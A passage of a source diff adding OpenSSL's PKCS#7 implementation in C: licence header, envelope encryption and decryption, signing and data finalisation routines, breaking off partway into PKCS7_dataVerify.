+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/err.h>
+
+static int add_attribute(STACK_OF(X509_ATTRIBUTE) **sk, int nid, int atrtype,
+                         void *value);
+static ASN1_TYPE *get_attribute(STACK_OF(X509_ATTRIBUTE) *sk, int nid);
+
+static int PKCS7_type_is_other(PKCS7 *p7)
+{
+    int isOther = 1;
+
+    int nid = OBJ_obj2nid(p7->type);
+
+    switch (nid) {
+    case NID_pkcs7_data:
+    case NID_pkcs7_signed:
+    case NID_pkcs7_enveloped:
+    case NID_pkcs7_signedAndEnveloped:
+    case NID_pkcs7_digest:
+    case NID_pkcs7_encrypted:
+        isOther = 0;
+        break;
+    default:
+        isOther = 1;
+    }
+
+    return isOther;
+
+}
+
+static ASN1_OCTET_STRING *PKCS7_get_octet_string(PKCS7 *p7)
+{
+    if (PKCS7_type_is_data(p7))
+        return p7->d.data;
+    if (PKCS7_type_is_other(p7) && p7->d.other
+        && (p7->d.other->type == V_ASN1_OCTET_STRING))
+        return p7->d.other->value.octet_string;
+    return NULL;
+}
+
+static int PKCS7_bio_add_digest(BIO **pbio, X509_ALGOR *alg)
+{
+    BIO *btmp;
+    const EVP_MD *md;
+    if ((btmp = BIO_new(BIO_f_md())) == NULL) {
+        PKCS7err(PKCS7_F_PKCS7_BIO_ADD_DIGEST, ERR_R_BIO_LIB);
+        goto err;
+    }
+
+    md = EVP_get_digestbyobj(alg->algorithm);
+    if (md == NULL) {
+        PKCS7err(PKCS7_F_PKCS7_BIO_ADD_DIGEST, PKCS7_R_UNKNOWN_DIGEST_TYPE);
+        goto err;
+    }
+
+    BIO_set_md(btmp, md);
+    if (*pbio == NULL)
+        *pbio = btmp;
+    else if (!BIO_push(*pbio, btmp)) {
+        PKCS7err(PKCS7_F_PKCS7_BIO_ADD_DIGEST, ERR_R_BIO_LIB);
+        goto err;
+    }
+    btmp = NULL;
+
+    return 1;
+
+ err:
+    if (btmp)
+        BIO_free(btmp);
+    return 0;
+
+}
+
+static int pkcs7_encode_rinfo(PKCS7_RECIP_INFO *ri,
+                              unsigned char *key, int keylen)
+{
+    EVP_PKEY_CTX *pctx = NULL;
+    EVP_PKEY *pkey = NULL;
+    unsigned char *ek = NULL;
+    int ret = 0;
+    size_t eklen;
+
+    pkey = X509_get_pubkey(ri->cert);
+
+    if (!pkey)
+        return 0;
+
+    pctx = EVP_PKEY_CTX_new(pkey, NULL);
+    if (!pctx)
+        return 0;
+
+    if (EVP_PKEY_encrypt_init(pctx) <= 0)
+        goto err;
+
+    if (EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_ENCRYPT,
+                          EVP_PKEY_CTRL_PKCS7_ENCRYPT, 0, ri) <= 0) {
+        PKCS7err(PKCS7_F_PKCS7_ENCODE_RINFO, PKCS7_R_CTRL_ERROR);
+        goto err;
+    }
+
+    if (EVP_PKEY_encrypt(pctx, NULL, &eklen, key, keylen) <= 0)
+        goto err;
+
+    ek = OPENSSL_malloc(eklen);
+
+    if (ek == NULL) {
+        PKCS7err(PKCS7_F_PKCS7_ENCODE_RINFO, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (EVP_PKEY_encrypt(pctx, ek, &eklen, key, keylen) <= 0)
+        goto err;
+
+    ASN1_STRING_set0(ri->enc_key, ek, eklen);
+    ek = NULL;
+
+    ret = 1;
+
+ err:
+    if (pkey)
+        EVP_PKEY_free(pkey);
+    if (pctx)
+        EVP_PKEY_CTX_free(pctx);
+    if (ek)
+        OPENSSL_free(ek);
+    return ret;
+
+}
+
+static int pkcs7_decrypt_rinfo(unsigned char **pek, int *peklen,
+                               PKCS7_RECIP_INFO *ri, EVP_PKEY *pkey)
+{
+    EVP_PKEY_CTX *pctx = NULL;
+    unsigned char *ek = NULL;
+    size_t eklen;
+
+    int ret = -1;
+
+    pctx = EVP_PKEY_CTX_new(pkey, NULL);
+    if (!pctx)
+        return -1;
+
+    if (EVP_PKEY_decrypt_init(pctx) <= 0)
+        goto err;
+
+    if (EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_DECRYPT,
+                          EVP_PKEY_CTRL_PKCS7_DECRYPT, 0, ri) <= 0) {
+        PKCS7err(PKCS7_F_PKCS7_DECRYPT_RINFO, PKCS7_R_CTRL_ERROR);
+        goto err;
+    }
+
+    if (EVP_PKEY_decrypt(pctx, NULL, &eklen,
+                         ri->enc_key->data, ri->enc_key->length) <= 0)
+        goto err;
+
+    ek = OPENSSL_malloc(eklen);
+
+    if (ek == NULL) {
+        PKCS7err(PKCS7_F_PKCS7_DECRYPT_RINFO, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (EVP_PKEY_decrypt(pctx, ek, &eklen,
+                         ri->enc_key->data, ri->enc_key->length) <= 0) {
+        ret = 0;
+        PKCS7err(PKCS7_F_PKCS7_DECRYPT_RINFO, ERR_R_EVP_LIB);
+        goto err;
+    }
+
+    ret = 1;
+
+    if (*pek) {
+        OPENSSL_cleanse(*pek, *peklen);
+        OPENSSL_free(*pek);
+    }
+
+    *pek = ek;
+    *peklen = eklen;
+
+ err:
+    if (pctx)
+        EVP_PKEY_CTX_free(pctx);
+    if (!ret && ek)
+        OPENSSL_free(ek);
+
+    return ret;
+}
+
+BIO *PKCS7_dataInit(PKCS7 *p7, BIO *bio)
+{
+    int i;
+    BIO *out = NULL, *btmp = NULL;
+    X509_ALGOR *xa = NULL;
+    const EVP_CIPHER *evp_cipher = NULL;
+    STACK_OF(X509_ALGOR) *md_sk = NULL;
+    STACK_OF(PKCS7_RECIP_INFO) *rsk = NULL;
+    X509_ALGOR *xalg = NULL;
+    PKCS7_RECIP_INFO *ri = NULL;
+    ASN1_OCTET_STRING *os = NULL;
+
+    i = OBJ_obj2nid(p7->type);
+    p7->state = PKCS7_S_HEADER;
+
+    switch (i) {
+    case NID_pkcs7_signed:
+        md_sk = p7->d.sign->md_algs;
+        os = PKCS7_get_octet_string(p7->d.sign->contents);
+        break;
+    case NID_pkcs7_signedAndEnveloped:
+        rsk = p7->d.signed_and_enveloped->recipientinfo;
+        md_sk = p7->d.signed_and_enveloped->md_algs;
+        xalg = p7->d.signed_and_enveloped->enc_data->algorithm;
+        evp_cipher = p7->d.signed_and_enveloped->enc_data->cipher;
+        if (evp_cipher == NULL) {
+            PKCS7err(PKCS7_F_PKCS7_DATAINIT, PKCS7_R_CIPHER_NOT_INITIALIZED);
+            goto err;
+        }
+        break;
+    case NID_pkcs7_enveloped:
+        rsk = p7->d.enveloped->recipientinfo;
+        xalg = p7->d.enveloped->enc_data->algorithm;
+        evp_cipher = p7->d.enveloped->enc_data->cipher;
+        if (evp_cipher == NULL) {
+            PKCS7err(PKCS7_F_PKCS7_DATAINIT, PKCS7_R_CIPHER_NOT_INITIALIZED);
+            goto err;
+        }
+        break;
+    case NID_pkcs7_digest:
+        xa = p7->d.digest->md;
+        os = PKCS7_get_octet_string(p7->d.digest->contents);
+        break;
+    case NID_pkcs7_data:
+        break;
+    default:
+        PKCS7err(PKCS7_F_PKCS7_DATAINIT, PKCS7_R_UNSUPPORTED_CONTENT_TYPE);
+        goto err;
+    }
+
+    for (i = 0; i < sk_X509_ALGOR_num(md_sk); i++)
+        if (!PKCS7_bio_add_digest(&out, sk_X509_ALGOR_value(md_sk, i)))
+            goto err;
+
+    if (xa && !PKCS7_bio_add_digest(&out, xa))
+        goto err;
+
+    if (evp_cipher != NULL) {
+        unsigned char key[EVP_MAX_KEY_LENGTH];
+        unsigned char iv[EVP_MAX_IV_LENGTH];
+        int keylen, ivlen;
+        EVP_CIPHER_CTX *ctx;
+
+        if ((btmp = BIO_new(BIO_f_cipher())) == NULL) {
+            PKCS7err(PKCS7_F_PKCS7_DATAINIT, ERR_R_BIO_LIB);
+            goto err;
+        }
+        BIO_get_cipher_ctx(btmp, &ctx);
+        keylen = EVP_CIPHER_key_length(evp_cipher);
+        ivlen = EVP_CIPHER_iv_length(evp_cipher);
+        xalg->algorithm = OBJ_nid2obj(EVP_CIPHER_type(evp_cipher));
+        if (ivlen > 0)
+            if (RAND_pseudo_bytes(iv, ivlen) <= 0)
+                goto err;
+        if (EVP_CipherInit_ex(ctx, evp_cipher, NULL, NULL, NULL, 1) <= 0)
+            goto err;
+        if (EVP_CIPHER_CTX_rand_key(ctx, key) <= 0)
+            goto err;
+        if (EVP_CipherInit_ex(ctx, NULL, NULL, key, iv, 1) <= 0)
+            goto err;
+
+        if (ivlen > 0) {
+            if (xalg->parameter == NULL) {
+                xalg->parameter = ASN1_TYPE_new();
+                if (xalg->parameter == NULL)
+                    goto err;
+            }
+            if (EVP_CIPHER_param_to_asn1(ctx, xalg->parameter) < 0)
+                goto err;
+        }
+
+        /* Lets do the pub key stuff :-) */
+        for (i = 0; i < sk_PKCS7_RECIP_INFO_num(rsk); i++) {
+            ri = sk_PKCS7_RECIP_INFO_value(rsk, i);
+            if (pkcs7_encode_rinfo(ri, key, keylen) <= 0)
+                goto err;
+        }
+        OPENSSL_cleanse(key, keylen);
+
+        if (out == NULL)
+            out = btmp;
+        else
+            BIO_push(out, btmp);
+        btmp = NULL;
+    }
+
+    if (bio == NULL) {
+        if (PKCS7_is_detached(p7))
+            bio = BIO_new(BIO_s_null());
+        else if (os && os->length > 0)
+            bio = BIO_new_mem_buf(os->data, os->length);
+        if (bio == NULL) {
+            bio = BIO_new(BIO_s_mem());
+            if (bio == NULL)
+                goto err;
+            BIO_set_mem_eof_return(bio, 0);
+        }
+    }
+    if (out)
+        BIO_push(out, bio);
+    else
+        out = bio;
+    bio = NULL;
+    if (0) {
+ err:
+        if (out != NULL)
+            BIO_free_all(out);
+        if (btmp != NULL)
+            BIO_free_all(btmp);
+        out = NULL;
+    }
+    return (out);
+}
+
+static int pkcs7_cmp_ri(PKCS7_RECIP_INFO *ri, X509 *pcert)
+{
+    int ret;
+    ret = X509_NAME_cmp(ri->issuer_and_serial->issuer,
+                        pcert->cert_info->issuer);
+    if (ret)
+        return ret;
+    return M_ASN1_INTEGER_cmp(pcert->cert_info->serialNumber,
+                              ri->issuer_and_serial->serial);
+}
+
+/* int */
+BIO *PKCS7_dataDecode(PKCS7 *p7, EVP_PKEY *pkey, BIO *in_bio, X509 *pcert)
+{
+    int i, j;
+    BIO *out = NULL, *btmp = NULL, *etmp = NULL, *bio = NULL;
+    X509_ALGOR *xa;
+    ASN1_OCTET_STRING *data_body = NULL;
+    const EVP_MD *evp_md;
+    const EVP_CIPHER *evp_cipher = NULL;
+    EVP_CIPHER_CTX *evp_ctx = NULL;
+    X509_ALGOR *enc_alg = NULL;
+    STACK_OF(X509_ALGOR) *md_sk = NULL;
+    STACK_OF(PKCS7_RECIP_INFO) *rsk = NULL;
+    PKCS7_RECIP_INFO *ri = NULL;
+    unsigned char *ek = NULL, *tkey = NULL;
+    int eklen = 0, tkeylen = 0;
+
+    i = OBJ_obj2nid(p7->type);
+    p7->state = PKCS7_S_HEADER;
+
+    switch (i) {
+    case NID_pkcs7_signed:
+        data_body = PKCS7_get_octet_string(p7->d.sign->contents);
+        if (!PKCS7_is_detached(p7) && data_body == NULL) {
+            PKCS7err(PKCS7_F_PKCS7_DATADECODE,
+                     PKCS7_R_INVALID_SIGNED_DATA_TYPE);
+            goto err;
+        }
+        md_sk = p7->d.sign->md_algs;
+        break;
+    case NID_pkcs7_signedAndEnveloped:
+        rsk = p7->d.signed_and_enveloped->recipientinfo;
+        md_sk = p7->d.signed_and_enveloped->md_algs;
+        data_body = p7->d.signed_and_enveloped->enc_data->enc_data;
+        enc_alg = p7->d.signed_and_enveloped->enc_data->algorithm;
+        evp_cipher = EVP_get_cipherbyobj(enc_alg->algorithm);
+        if (evp_cipher == NULL) {
+            PKCS7err(PKCS7_F_PKCS7_DATADECODE,
+                     PKCS7_R_UNSUPPORTED_CIPHER_TYPE);
+            goto err;
+        }
+        break;
+    case NID_pkcs7_enveloped:
+        rsk = p7->d.enveloped->recipientinfo;
+        enc_alg = p7->d.enveloped->enc_data->algorithm;
+        data_body = p7->d.enveloped->enc_data->enc_data;
+        evp_cipher = EVP_get_cipherbyobj(enc_alg->algorithm);
+        if (evp_cipher == NULL) {
+            PKCS7err(PKCS7_F_PKCS7_DATADECODE,
+                     PKCS7_R_UNSUPPORTED_CIPHER_TYPE);
+            goto err;
+        }
+        break;
+    default:
+        PKCS7err(PKCS7_F_PKCS7_DATADECODE, PKCS7_R_UNSUPPORTED_CONTENT_TYPE);
+        goto err;
+    }
+
+    /* We will be checking the signature */
+    if (md_sk != NULL) {
+        for (i = 0; i < sk_X509_ALGOR_num(md_sk); i++) {
+            xa = sk_X509_ALGOR_value(md_sk, i);
+            if ((btmp = BIO_new(BIO_f_md())) == NULL) {
+                PKCS7err(PKCS7_F_PKCS7_DATADECODE, ERR_R_BIO_LIB);
+                goto err;
+            }
+
+            j = OBJ_obj2nid(xa->algorithm);
+            evp_md = EVP_get_digestbynid(j);
+            if (evp_md == NULL) {
+                PKCS7err(PKCS7_F_PKCS7_DATADECODE,
+                         PKCS7_R_UNKNOWN_DIGEST_TYPE);
+                goto err;
+            }
+
+            BIO_set_md(btmp, evp_md);
+            if (out == NULL)
+                out = btmp;
+            else
+                BIO_push(out, btmp);
+            btmp = NULL;
+        }
+    }
+
+    if (evp_cipher != NULL) {
+#if 0
+        unsigned char key[EVP_MAX_KEY_LENGTH];
+        unsigned char iv[EVP_MAX_IV_LENGTH];
+        unsigned char *p;
+        int keylen, ivlen;
+        int max;
+        X509_OBJECT ret;
+#endif
+
+        if ((etmp = BIO_new(BIO_f_cipher())) == NULL) {
+            PKCS7err(PKCS7_F_PKCS7_DATADECODE, ERR_R_BIO_LIB);
+            goto err;
+        }
+
+        /*
+         * It was encrypted, we need to decrypt the secret key with the
+         * private key
+         */
+
+        /*
+         * Find the recipientInfo which matches the passed certificate (if
+         * any)
+         */
+
+        if (pcert) {
+            for (i = 0; i < sk_PKCS7_RECIP_INFO_num(rsk); i++) {
+                ri = sk_PKCS7_RECIP_INFO_value(rsk, i);
+                if (!pkcs7_cmp_ri(ri, pcert))
+                    break;
+                ri = NULL;
+            }
+            if (ri == NULL) {
+                PKCS7err(PKCS7_F_PKCS7_DATADECODE,
+                         PKCS7_R_NO_RECIPIENT_MATCHES_CERTIFICATE);
+                goto err;
+            }
+        }
+
+        /* If we haven't got a certificate try each ri in turn */
+        if (pcert == NULL) {
+            /*
+             * Always attempt to decrypt all rinfo even after sucess as a
+             * defence against MMA timing attacks.
+             */
+            for (i = 0; i < sk_PKCS7_RECIP_INFO_num(rsk); i++) {
+                ri = sk_PKCS7_RECIP_INFO_value(rsk, i);
+
+                if (pkcs7_decrypt_rinfo(&ek, &eklen, ri, pkey) < 0)
+                    goto err;
+                ERR_clear_error();
+            }
+        } else {
+            /* Only exit on fatal errors, not decrypt failure */
+            if (pkcs7_decrypt_rinfo(&ek, &eklen, ri, pkey) < 0)
+                goto err;
+            ERR_clear_error();
+        }
+
+        evp_ctx = NULL;
+        BIO_get_cipher_ctx(etmp, &evp_ctx);
+        if (EVP_CipherInit_ex(evp_ctx, evp_cipher, NULL, NULL, NULL, 0) <= 0)
+            goto err;
+        if (EVP_CIPHER_asn1_to_param(evp_ctx, enc_alg->parameter) < 0)
+            goto err;
+        /* Generate random key as MMA defence */
+        tkeylen = EVP_CIPHER_CTX_key_length(evp_ctx);
+        tkey = OPENSSL_malloc(tkeylen);
+        if (!tkey)
+            goto err;
+        if (EVP_CIPHER_CTX_rand_key(evp_ctx, tkey) <= 0)
+            goto err;
+        if (ek == NULL) {
+            ek = tkey;
+            eklen = tkeylen;
+            tkey = NULL;
+        }
+
+        if (eklen != EVP_CIPHER_CTX_key_length(evp_ctx)) {
+            /*
+             * Some S/MIME clients don't use the same key and effective key
+             * length. The key length is determined by the size of the
+             * decrypted RSA key.
+             */
+            if (!EVP_CIPHER_CTX_set_key_length(evp_ctx, eklen)) {
+                /* Use random key as MMA defence */
+                OPENSSL_cleanse(ek, eklen);
+                OPENSSL_free(ek);
+                ek = tkey;
+                eklen = tkeylen;
+                tkey = NULL;
+            }
+        }
+        /* Clear errors so we don't leak information useful in MMA */
+        ERR_clear_error();
+        if (EVP_CipherInit_ex(evp_ctx, NULL, NULL, ek, NULL, 0) <= 0)
+            goto err;
+
+        if (ek) {
+            OPENSSL_cleanse(ek, eklen);
+            OPENSSL_free(ek);
+            ek = NULL;
+        }
+        if (tkey) {
+            OPENSSL_cleanse(tkey, tkeylen);
+            OPENSSL_free(tkey);
+            tkey = NULL;
+        }
+
+        if (out == NULL)
+            out = etmp;
+        else
+            BIO_push(out, etmp);
+        etmp = NULL;
+    }
+#if 1
+    if (PKCS7_is_detached(p7) || (in_bio != NULL)) {
+        bio = in_bio;
+    } else {
+# if 0
+        bio = BIO_new(BIO_s_mem());
+        /*
+         * We need to set this so that when we have read all the data, the
+         * encrypt BIO, if present, will read EOF and encode the last few
+         * bytes
+         */
+        BIO_set_mem_eof_return(bio, 0);
+
+        if (data_body->length > 0)
+            BIO_write(bio, (char *)data_body->data, data_body->length);
+# else
+        if (data_body->length > 0)
+            bio = BIO_new_mem_buf(data_body->data, data_body->length);
+        else {
+            bio = BIO_new(BIO_s_mem());
+            BIO_set_mem_eof_return(bio, 0);
+        }
+        if (bio == NULL)
+            goto err;
+# endif
+    }
+    BIO_push(out, bio);
+    bio = NULL;
+#endif
+    if (0) {
+ err:
+        if (ek) {
+            OPENSSL_cleanse(ek, eklen);
+            OPENSSL_free(ek);
+        }
+        if (tkey) {
+            OPENSSL_cleanse(tkey, tkeylen);
+            OPENSSL_free(tkey);
+        }
+        if (out != NULL)
+            BIO_free_all(out);
+        if (btmp != NULL)
+            BIO_free_all(btmp);
+        if (etmp != NULL)
+            BIO_free_all(etmp);
+        if (bio != NULL)
+            BIO_free_all(bio);
+        out = NULL;
+    }
+    return (out);
+}
+
+static BIO *PKCS7_find_digest(EVP_MD_CTX **pmd, BIO *bio, int nid)
+{
+    for (;;) {
+        bio = BIO_find_type(bio, BIO_TYPE_MD);
+        if (bio == NULL) {
+            PKCS7err(PKCS7_F_PKCS7_FIND_DIGEST,
+                     PKCS7_R_UNABLE_TO_FIND_MESSAGE_DIGEST);
+            return NULL;
+        }
+        BIO_get_md_ctx(bio, pmd);
+        if (*pmd == NULL) {
+            PKCS7err(PKCS7_F_PKCS7_FIND_DIGEST, ERR_R_INTERNAL_ERROR);
+            return NULL;
+        }
+        if (EVP_MD_CTX_type(*pmd) == nid)
+            return bio;
+        bio = BIO_next(bio);
+    }
+    return NULL;
+}
+
+static int do_pkcs7_signed_attrib(PKCS7_SIGNER_INFO *si, EVP_MD_CTX *mctx)
+{
+    unsigned char md_data[EVP_MAX_MD_SIZE];
+    unsigned int md_len;
+
+    /* Add signing time if not already present */
+    if (!PKCS7_get_signed_attribute(si, NID_pkcs9_signingTime)) {
+        if (!PKCS7_add0_attrib_signing_time(si, NULL)) {
+            PKCS7err(PKCS7_F_DO_PKCS7_SIGNED_ATTRIB, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+    }
+
+    /* Add digest */
+    if (!EVP_DigestFinal_ex(mctx, md_data, &md_len)) {
+        PKCS7err(PKCS7_F_DO_PKCS7_SIGNED_ATTRIB, ERR_R_EVP_LIB);
+        return 0;
+    }
+    if (!PKCS7_add1_attrib_digest(si, md_data, md_len)) {
+        PKCS7err(PKCS7_F_DO_PKCS7_SIGNED_ATTRIB, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    /* Now sign the attributes */
+    if (!PKCS7_SIGNER_INFO_sign(si))
+        return 0;
+
+    return 1;
+}
+
+int PKCS7_dataFinal(PKCS7 *p7, BIO *bio)
+{
+    int ret = 0;
+    int i, j;
+    BIO *btmp;
+    PKCS7_SIGNER_INFO *si;
+    EVP_MD_CTX *mdc, ctx_tmp;
+    STACK_OF(X509_ATTRIBUTE) *sk;
+    STACK_OF(PKCS7_SIGNER_INFO) *si_sk = NULL;
+    ASN1_OCTET_STRING *os = NULL;
+
+    EVP_MD_CTX_init(&ctx_tmp);
+    i = OBJ_obj2nid(p7->type);
+    p7->state = PKCS7_S_HEADER;
+
+    switch (i) {
+    case NID_pkcs7_data:
+        os = p7->d.data;
+        break;
+    case NID_pkcs7_signedAndEnveloped:
+        /* XXXXXXXXXXXXXXXX */
+        si_sk = p7->d.signed_and_enveloped->signer_info;
+        os = p7->d.signed_and_enveloped->enc_data->enc_data;
+        if (!os) {
+            os = M_ASN1_OCTET_STRING_new();
+            if (!os) {
+                PKCS7err(PKCS7_F_PKCS7_DATAFINAL, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            p7->d.signed_and_enveloped->enc_data->enc_data = os;
+        }
+        break;
+    case NID_pkcs7_enveloped:
+        /* XXXXXXXXXXXXXXXX */
+        os = p7->d.enveloped->enc_data->enc_data;
+        if (!os) {
+            os = M_ASN1_OCTET_STRING_new();
+            if (!os) {
+                PKCS7err(PKCS7_F_PKCS7_DATAFINAL, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            p7->d.enveloped->enc_data->enc_data = os;
+        }
+        break;
+    case NID_pkcs7_signed:
+        si_sk = p7->d.sign->signer_info;
+        os = PKCS7_get_octet_string(p7->d.sign->contents);
+        /* If detached data then the content is excluded */
+        if (PKCS7_type_is_data(p7->d.sign->contents) && p7->detached) {
+            M_ASN1_OCTET_STRING_free(os);
+            p7->d.sign->contents->d.data = NULL;
+        }
+        break;
+
+    case NID_pkcs7_digest:
+        os = PKCS7_get_octet_string(p7->d.digest->contents);
+        /* If detached data then the content is excluded */
+        if (PKCS7_type_is_data(p7->d.digest->contents) && p7->detached) {
+            M_ASN1_OCTET_STRING_free(os);
+            p7->d.digest->contents->d.data = NULL;
+        }
+        break;
+
+    default:
+        PKCS7err(PKCS7_F_PKCS7_DATAFINAL, PKCS7_R_UNSUPPORTED_CONTENT_TYPE);
+        goto err;
+    }
+
+    if (si_sk != NULL) {
+        for (i = 0; i < sk_PKCS7_SIGNER_INFO_num(si_sk); i++) {
+            si = sk_PKCS7_SIGNER_INFO_value(si_sk, i);
+            if (si->pkey == NULL)
+                continue;
+
+            j = OBJ_obj2nid(si->digest_alg->algorithm);
+
+            btmp = bio;
+
+            btmp = PKCS7_find_digest(&mdc, btmp, j);
+
+            if (btmp == NULL)
+                goto err;
+
+            /*
+             * We now have the EVP_MD_CTX, lets do the signing.
+             */
+            if (!EVP_MD_CTX_copy_ex(&ctx_tmp, mdc))
+                goto err;
+
+            sk = si->auth_attr;
+
+            /*
+             * If there are attributes, we add the digest attribute and only
+             * sign the attributes
+             */
+            if (sk_X509_ATTRIBUTE_num(sk) > 0) {
+                if (!do_pkcs7_signed_attrib(si, &ctx_tmp))
+                    goto err;
+            } else {
+                unsigned char *abuf = NULL;
+                unsigned int abuflen;
+                abuflen = EVP_PKEY_size(si->pkey);
+                abuf = OPENSSL_malloc(abuflen);
+                if (!abuf)
+                    goto err;
+
+                if (!EVP_SignFinal(&ctx_tmp, abuf, &abuflen, si->pkey)) {
+                    PKCS7err(PKCS7_F_PKCS7_DATAFINAL, ERR_R_EVP_LIB);
+                    goto err;
+                }
+                ASN1_STRING_set0(si->enc_digest, abuf, abuflen);
+            }
+        }
+    } else if (i == NID_pkcs7_digest) {
+        unsigned char md_data[EVP_MAX_MD_SIZE];
+        unsigned int md_len;
+        if (!PKCS7_find_digest(&mdc, bio,
+                               OBJ_obj2nid(p7->d.digest->md->algorithm)))
+            goto err;
+        if (!EVP_DigestFinal_ex(mdc, md_data, &md_len))
+            goto err;
+        M_ASN1_OCTET_STRING_set(p7->d.digest->digest, md_data, md_len);
+    }
+
+    if (!PKCS7_is_detached(p7) && !(os->flags & ASN1_STRING_FLAG_NDEF)) {
+        char *cont;
+        long contlen;
+        btmp = BIO_find_type(bio, BIO_TYPE_MEM);
+        if (btmp == NULL) {
+            PKCS7err(PKCS7_F_PKCS7_DATAFINAL, PKCS7_R_UNABLE_TO_FIND_MEM_BIO);
+            goto err;
+        }
+        contlen = BIO_get_mem_data(btmp, &cont);
+        /*
+         * Mark the BIO read only then we can use its copy of the data
+         * instead of making an extra copy.
+         */
+        BIO_set_flags(btmp, BIO_FLAGS_MEM_RDONLY);
+        BIO_set_mem_eof_return(btmp, 0);
+        ASN1_STRING_set0(os, (unsigned char *)cont, contlen);
+    }
+    ret = 1;
+ err:
+    EVP_MD_CTX_cleanup(&ctx_tmp);
+    return (ret);
+}
+
+int PKCS7_SIGNER_INFO_sign(PKCS7_SIGNER_INFO *si)
+{
+    EVP_MD_CTX mctx;
+    EVP_PKEY_CTX *pctx;
+    unsigned char *abuf = NULL;
+    int alen;
+    size_t siglen;
+    const EVP_MD *md = NULL;
+
+    md = EVP_get_digestbyobj(si->digest_alg->algorithm);
+    if (md == NULL)
+        return 0;
+
+    EVP_MD_CTX_init(&mctx);
+    if (EVP_DigestSignInit(&mctx, &pctx, md, NULL, si->pkey) <= 0)
+        goto err;
+
+    if (EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_SIGN,
+                          EVP_PKEY_CTRL_PKCS7_SIGN, 0, si) <= 0) {
+        PKCS7err(PKCS7_F_PKCS7_SIGNER_INFO_SIGN, PKCS7_R_CTRL_ERROR);
+        goto err;
+    }
+
+    alen = ASN1_item_i2d((ASN1_VALUE *)si->auth_attr, &abuf,
+                         ASN1_ITEM_rptr(PKCS7_ATTR_SIGN));
+    if (!abuf)
+        goto err;
+    if (EVP_DigestSignUpdate(&mctx, abuf, alen) <= 0)
+        goto err;
+    OPENSSL_free(abuf);
+    abuf = NULL;
+    if (EVP_DigestSignFinal(&mctx, NULL, &siglen) <= 0)
+        goto err;
+    abuf = OPENSSL_malloc(siglen);
+    if (!abuf)
+        goto err;
+    if (EVP_DigestSignFinal(&mctx, abuf, &siglen) <= 0)
+        goto err;
+
+    if (EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_SIGN,
+                          EVP_PKEY_CTRL_PKCS7_SIGN, 1, si) <= 0) {
+        PKCS7err(PKCS7_F_PKCS7_SIGNER_INFO_SIGN, PKCS7_R_CTRL_ERROR);
+        goto err;
+    }
+
+    EVP_MD_CTX_cleanup(&mctx);
+
+    ASN1_STRING_set0(si->enc_digest, abuf, siglen);
+
+    return 1;
+
+ err:
+    if (abuf)
+        OPENSSL_free(abuf);
+    EVP_MD_CTX_cleanup(&mctx);
+    return 0;
+
+}
+
+int PKCS7_dataVerify(X509_STORE *cert_store, X509_STORE_CTX *ctx, BIO *bio,
+                     PKCS7 *p7, PKCS7_SIGNER_INFO *si)
+{
+    PKCS7_ISSUER_AND_SERIAL *ias;
+    int ret = 0, i;
+    STACK_OF(X509) *cert;
+    X509 *x509;
+
+    if (PKCS7_type_is_signed(p7)) {
+        cert = p7->d.sign->cert;
+    } else if (PKCS7_type_is_signedAndEnveloped(p7)) {
+        cert = p7->d.signed_and_enveloped->cert;
+    } else {
+        PKCS7err(PKCS7_F_PKCS7_DATAVERIFY, PKCS7_R_WRONG_PKCS7_TYPE);
+        goto err;
+    }
+    /* XXXXXXXXXXXXXXXXXXXXXXX */
+    ias = si->issuer_and_serial;
+
+    x509 = X509_find_by_issuer_and_serial(cert, ias->issuer, ias->serial);
+
+    /* were we able to find the cert in passed to us */
+    if (x509 == NULL) {
